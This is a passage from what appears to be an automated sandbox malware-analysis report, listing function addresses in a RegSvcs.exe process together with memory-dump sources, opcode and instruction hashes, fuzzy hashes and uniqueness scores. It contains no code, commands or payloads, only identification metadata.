                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 565243349f37cd70ca52f94ee980e92571f9820dbd653e63b61b007e63866e31
                                                                                  • Instruction ID: 42e97251a669ea3fab090dd54bffdf694a21c024469c778ab84cb3d1475e27d0
                                                                                  • Opcode Fuzzy Hash: 565243349f37cd70ca52f94ee980e92571f9820dbd653e63b61b007e63866e31
                                                                                  • Instruction Fuzzy Hash: C2315C34E10609DBCB15DFA8D89469EBBB2BF89300F10C929E906E7390DF71AD46CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D3AA0 Relevance: .1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b70e7a14df0c0e77f017c1e0e7543508136a357290f17a908a0543d3256b7a94
                                                                                  • Instruction ID: b8a702e0caa8281f4ba0870354c95d357059ee757a5fa939c59ee5be3ace5b9a
                                                                                  • Opcode Fuzzy Hash: b70e7a14df0c0e77f017c1e0e7543508136a357290f17a908a0543d3256b7a94
                                                                                  • Instruction Fuzzy Hash: 11213975F01615DFEB50DF69D880AAEBBF5BB48610F148429E905EB384E735DC408B91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D3A91 Relevance: .1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 85483977fcbb5caf153fe52505a0c450cdcb61c8b743be9a0739db4624061cd3
                                                                                  • Instruction ID: 54895c417d862c363fd5e40abc3cb5c39bfa007987097c3dec5b196f988c5711
                                                                                  • Opcode Fuzzy Hash: 85483977fcbb5caf153fe52505a0c450cdcb61c8b743be9a0739db4624061cd3
                                                                                  • Instruction Fuzzy Hash: A7214A75F00215DFEB50DF68E981BAEBBF5BB48210F14842AE915EB384E735DC018B90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00F5D01C Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2759594842.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_f5d000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9c177685c1add38a909d923ad45fb511a6858a54b326778fbcd54074164fa05a
                                                                                  • Instruction ID: 35123ccdae35bcab2f04a0960e2d59a6d8eb92092655240a5f2dddbd99284965
                                                                                  • Opcode Fuzzy Hash: 9c177685c1add38a909d923ad45fb511a6858a54b326778fbcd54074164fa05a
                                                                                  • Instruction Fuzzy Hash: C0210076605300DFDB24DF10D884B16BB61FB84326F20C569DE0A4B28AC33AD80BDA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DA38B Relevance: .1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9096b135303a7cfcee4da9b5a53e478e4b5abc65db36f641cb376615736404ad
                                                                                  • Instruction ID: dda0eed4fc3ce9e41e9f328ba76c8f60cb0e859ea9e2d89bc8455f37925d7d23
                                                                                  • Opcode Fuzzy Hash: 9096b135303a7cfcee4da9b5a53e478e4b5abc65db36f641cb376615736404ad
                                                                                  • Instruction Fuzzy Hash: 4411D232F102144BDB709ABDD85579FB7E6E789B61F148439F90AE7380DA21EC018791
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00F5D005 Relevance: .1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2759594842.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_f5d000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 17fabf1c618a51b9a6e829d0c6b261e6a69eaeae00631a7347a5b1f204eb4a69
                                                                                  • Instruction ID: f706ec94d93c501ffce10fba0868dab251c9db6f34f403af0b56f17b96a9d71c
                                                                                  • Opcode Fuzzy Hash: 17fabf1c618a51b9a6e829d0c6b261e6a69eaeae00631a7347a5b1f204eb4a69
                                                                                  • Instruction Fuzzy Hash: 54219F755093C08FCB12CF24D990715BF71EB46325F28C5EAD9498F2A7C33A980ACB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D3BB0 Relevance: .1, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3bfb85f4b31dfc66408f7e6ae27ac11e934fc71e053a8b688d1ad9ac3a5d2476
                                                                                  • Instruction ID: 377456829117239d68d6fb2d9b600d1851b144967f4b74237026256208000375
                                                                                  • Opcode Fuzzy Hash: 3bfb85f4b31dfc66408f7e6ae27ac11e934fc71e053a8b688d1ad9ac3a5d2476
                                                                                  • Instruction Fuzzy Hash: 7F116131B141298BDB949A78D854AAF77EAEBC9710F008539D806E7394EE65DC028BD1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DED70 Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 26b7ce45db6175ba0680df3d98e50c6b617b24efa6fe24113c72e68b1ddca1eb
                                                                                  • Instruction ID: 72118819780d47ab827be3ad0b2e4106878d00976fe24d05d2ba1ae638d6cf54
                                                                                  • Opcode Fuzzy Hash: 26b7ce45db6175ba0680df3d98e50c6b617b24efa6fe24113c72e68b1ddca1eb
                                                                                  • Instruction Fuzzy Hash: AD01A235B106108FDBA6E67CD89572E77E6EBCA614F10882EF50ECB385DE25DC024791
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D3DE7 Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bdc21b179a7abb2f40224d8cf75432e815e86ab00188b399f533ffc2432786e1
                                                                                  • Instruction ID: cd9f591203ef0bc3f90d1bc57ae4281a3d4c3ab07a09f944680e32aa52ad1509
                                                                                  • Opcode Fuzzy Hash: bdc21b179a7abb2f40224d8cf75432e815e86ab00188b399f533ffc2432786e1
                                                                                  • Instruction Fuzzy Hash: AF017131B102114FEB65957C985476FB7E6EBCA710F14883AE80AC7395DA65DC024B82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D3870 Relevance: .1, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: df69107233e6f9fb10de844e3004f69cbff327a65f527202f6c693ab61e9815b
                                                                                  • Instruction ID: 61a8fd76adaa05e1793a0d00cabfb27a56073870587ee1d4f34b96ed5504861d
                                                                                  • Opcode Fuzzy Hash: df69107233e6f9fb10de844e3004f69cbff327a65f527202f6c693ab61e9815b
                                                                                  • Instruction Fuzzy Hash: 4F11D0B1D01219AFCB10DF9AD884ACEFBF4FB49710F10812AE918B7240C375A954CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D3869 Relevance: .1, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d879a17a25107b3d7802de9ecd071b62ff7a24c1842b9380d8b4ffea53c82126
                                                                                  • Instruction ID: 961d902925a0236ac1bfa1c47aba150e51ae11b5fbc971dbe86de7d28b176344
                                                                                  • Opcode Fuzzy Hash: d879a17a25107b3d7802de9ecd071b62ff7a24c1842b9380d8b4ffea53c82126
                                                                                  • Instruction Fuzzy Hash: A721EEB5D0121AAFDB10DF9AD884A8EFBF4FF48710F10812AE518B3240C374A554CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D3DF8 Relevance: .1, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c47244fc818aa2da174fbe9540f6b13bb9a8ddd5e5ff70d086c35fa996b7fa5b
                                                                                  • Instruction ID: 445da4a34f6240375c1b843deeeae7956a3fd232db94b2ea26d01f120eda36f8
                                                                                  • Opcode Fuzzy Hash: c47244fc818aa2da174fbe9540f6b13bb9a8ddd5e5ff70d086c35fa996b7fa5b
                                                                                  • Instruction Fuzzy Hash: DE016931B102114BDB74A56D985472FB7DAEBCBB10F208839E90AC73D5DE66DC024B92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DA2E8 Relevance: .0, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9a5846736870c69085aadb880facd4b748d5581ead4f1e6d1e08975010036f43
                                                                                  • Instruction ID: d16daa7e76dcc9a97889e39214986d11265ef7e32c352f61c21442aa30c60c53
                                                                                  • Opcode Fuzzy Hash: 9a5846736870c69085aadb880facd4b748d5581ead4f1e6d1e08975010036f43
                                                                                  • Instruction Fuzzy Hash: 0001A231B102104FDB71EA7CE95571FB7E6EB86A14F148428E90ACB384EF15DC018B95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D3BA1 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5aa8777b050391967f6f90084cdeb76967d8041f898e27403dccaa82e06fc14a
                                                                                  • Instruction ID: 36d025306471467a78cc279a6f3e0f1e354a390287634ed51f4ad1aceb24e33b
                                                                                  • Opcode Fuzzy Hash: 5aa8777b050391967f6f90084cdeb76967d8041f898e27403dccaa82e06fc14a
                                                                                  • Instruction Fuzzy Hash: FC01F732B1102A8BDF949678DC10BAF7ABAAFC9710F00453AD406E7280DE648C114BD1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DED80 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c34ed0e8bce8a802fb36d3ef58a3d5c537f287c7cfa8935d72bc850c514b99a3
                                                                                  • Instruction ID: fdc9f9ad9fc87af95c564dbbf90bbd541f3d9a4ca07d67bb7cd43f32770e7464
                                                                                  • Opcode Fuzzy Hash: c34ed0e8bce8a802fb36d3ef58a3d5c537f287c7cfa8935d72bc850c514b99a3
                                                                                  • Instruction Fuzzy Hash: EB01A431B101204BDBB5E52D949572F77DAEBC9624F10843DF50ECB384DE25DC024791
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DA2F8 Relevance: .0, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05509dce1f786b7c956f76803ef5d4c7ecb75035374b1fd44929995269a07fd5
                                                                                  • Instruction ID: 3eceb9ee41d26ced73f1f12eccd2904815c498f20291eb9642ccc43ad143788a
                                                                                  • Opcode Fuzzy Hash: 05509dce1f786b7c956f76803ef5d4c7ecb75035374b1fd44929995269a07fd5
                                                                                  • Instruction Fuzzy Hash: 38018131B101104FDB70AA6CD55071FB3D6EB86A14F108428E40AC7384EE25EC018B95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D6410 Relevance: .0, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5c2a59afa3f574c6ce5797fce52f7fe224d87b51fac9ef8a12c0d8a526b52960
                                                                                  • Instruction ID: e447e2e003f6f6e6f8375adb3897c05e288b74f5e858f311c3b2bbc67c39312c
                                                                                  • Opcode Fuzzy Hash: 5c2a59afa3f574c6ce5797fce52f7fe224d87b51fac9ef8a12c0d8a526b52960
                                                                                  • Instruction Fuzzy Hash: 3C016D319193958FEB12DB78A9653863FB1BF82104F1585EBC480CB0A3E339880AD796
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DC7B8 Relevance: .0, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a564d70249f3ea8e6514f191e85663aa1a7680abddd98040636b5445fd491a0
                                                                                  • Instruction ID: ef50a78c109ea1a747285cc484c3a0d51582bf0c595ecac41f9690a5831c7d1c
                                                                                  • Opcode Fuzzy Hash: 1a564d70249f3ea8e6514f191e85663aa1a7680abddd98040636b5445fd491a0
                                                                                  • Instruction Fuzzy Hash: B3F0A036E202289BDB24AA69EC00A9AB73AF784354F104429E901E7384DB31AC00CBC0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D82CE Relevance: .0, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7fb5380be7ea3374cc17e843b147457d38b5eaae83125415d5001341d2557eca
                                                                                  • Instruction ID: 3e85ffcec71228213eae30f1f5e6f407d5cc701074db07ead7d42c1af3282188
                                                                                  • Opcode Fuzzy Hash: 7fb5380be7ea3374cc17e843b147457d38b5eaae83125415d5001341d2557eca
                                                                                  • Instruction Fuzzy Hash: 0EF03936A04201DBEFB85A59FD803B873A4FB40260B148462DD09C71D5E731DA45DA91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D4639 Relevance: .0, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ba8f415e981c57e00f2461e2443e7a5c4bda001c3a92a466ca148c247adf8c87
                                                                                  • Instruction ID: 533ac28a871718678964cc5313ae529d6f14008d7bd6d2cb1bd6b73e938f0846
                                                                                  • Opcode Fuzzy Hash: ba8f415e981c57e00f2461e2443e7a5c4bda001c3a92a466ca148c247adf8c87
                                                                                  • Instruction Fuzzy Hash: D1F09E70A20219DFDB64DF94E8697AEBBB2FF44705F204519E402A7294CFB51D45DF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D6458 Relevance: .0, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d138504dca74f90a75ddfacdebe15f7230bae778fd5490481d6a20d0052fadb2
                                                                                  • Instruction ID: 413391d1162568add5bb9f72d0e05dafb04979f1fe2994ef937e87ea8cb03992
                                                                                  • Opcode Fuzzy Hash: d138504dca74f90a75ddfacdebe15f7230bae778fd5490481d6a20d0052fadb2
                                                                                  • Instruction Fuzzy Hash: 73E0C2B0E10108ABDF70CEB8C99575A73ACF701244F2084A4D448C7281E273CA068B81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Function 065D0040 Relevance: 2.0, Instructions: 1959COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 419dbcdd7768028832e25686fe69d27e3225157f30a4c917fc9ecd467eb4ae2c
                                                                                  • Instruction ID: b414383d19d8fa66911085878f1161c4a940de91593c3ebcf6a8645038ab4bd9
                                                                                  • Opcode Fuzzy Hash: 419dbcdd7768028832e25686fe69d27e3225157f30a4c917fc9ecd467eb4ae2c
                                                                                  • Instruction Fuzzy Hash: 6713FB31D10B198ADB21EF68C89069DF7B1FF99300F15D79AE448A7261EB70AAC4CF41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00FD41F8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2760392146.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_fd0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: \VRm
                                                                                  • API String ID: 0-1931484983
                                                                                  • Opcode ID: 86cc5dd189aee05d7b75a1918a8628733ee5d338339127e4023a667bd7df130b
                                                                                  • Instruction ID: 380dd9a5d33ae3725538a95e3231ef93e482c0340b33fc77c121ed21c740551f
                                                                                  • Opcode Fuzzy Hash: 86cc5dd189aee05d7b75a1918a8628733ee5d338339127e4023a667bd7df130b
                                                                                  • Instruction Fuzzy Hash: 50B14F71E00209CFDF14DFA9D8857ADBBF2AF88714F18812AD815A7394EB74A845EF41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DE388 Relevance: .6, Instructions: 574COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fcae206aca3df274b0e3c5a43a3f6ad020e75cf76fe3a1b3aa7254ee0529c5f7
                                                                                  • Instruction ID: 13ad9907bea69a79539e3a941c7a96548a64df27a825f82d531042716049ef2e
                                                                                  • Opcode Fuzzy Hash: fcae206aca3df274b0e3c5a43a3f6ad020e75cf76fe3a1b3aa7254ee0529c5f7
                                                                                  • Instruction Fuzzy Hash: 5E228D34B102158FDBA4DB68D885BAEB7F2FF89310F248569E406DB391DB35EC418B91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065BC100 Relevance: .5, Instructions: 521COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e04580334565250beccd1d8a47415840c6c212b357cbdc0b1a280e2eaec313d9
                                                                                  • Instruction ID: 03313ebe9dab3045f7f8d1f888d3a289f3c75b54c342172488830e94c00a614e
                                                                                  • Opcode Fuzzy Hash: e04580334565250beccd1d8a47415840c6c212b357cbdc0b1a280e2eaec313d9
                                                                                  • Instruction Fuzzy Hash: DC5256B4521706CFE710CF18E89A1997FB6FB81314BD24609E6A16F2E0DBB464CACF44
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D7678 Relevance: .5, Instructions: 468COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 365310617f6e6affe0b2a303bab332a9a702593a0d9d096bf63983500a6be08a
                                                                                  • Instruction ID: deeb77ecb3f19f08e5621f864f71e2729540024230139ed554e2d9c451ed5c17
                                                                                  • Opcode Fuzzy Hash: 365310617f6e6affe0b2a303bab332a9a702593a0d9d096bf63983500a6be08a
                                                                                  • Instruction Fuzzy Hash: BE121F30A00219DFDB68DF69D854B9EB7B2FF88301F2085A9D409AB395DB359D81DF81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D58C0 Relevance: .4, Instructions: 406COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 90de302f1899004b9e4e79abbef9e6ca16f268b7b7ae734d3f3dd2f161e82f9d
                                                                                  • Instruction ID: cf3142f36398d02f48e11b750f26aea9e1a9a63a526d450582bceacdf9a35169
                                                                                  • Opcode Fuzzy Hash: 90de302f1899004b9e4e79abbef9e6ca16f268b7b7ae734d3f3dd2f161e82f9d
                                                                                  • Instruction Fuzzy Hash: 71D1DF31B101148FDF64DB6CC494AAEBBB6FB89320F24846AE54ADB3D1DA71DD05CB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065BA868 Relevance: .3, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 92c242d6fe418d3147a858cdcc174115bb0a2c779fc9fdf8fd8635e12a90b14f
                                                                                  • Instruction ID: ff8a0f331d39c22b6011e59c87923abf37cb9261561beb392425ab239ba3a7fb
                                                                                  • Opcode Fuzzy Hash: 92c242d6fe418d3147a858cdcc174115bb0a2c779fc9fdf8fd8635e12a90b14f
                                                                                  • Instruction Fuzzy Hash: A0A15B32E0070A8FCF55DFA5C8805DEBBB2FF84300B15556AE815AB255DB75E945CF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%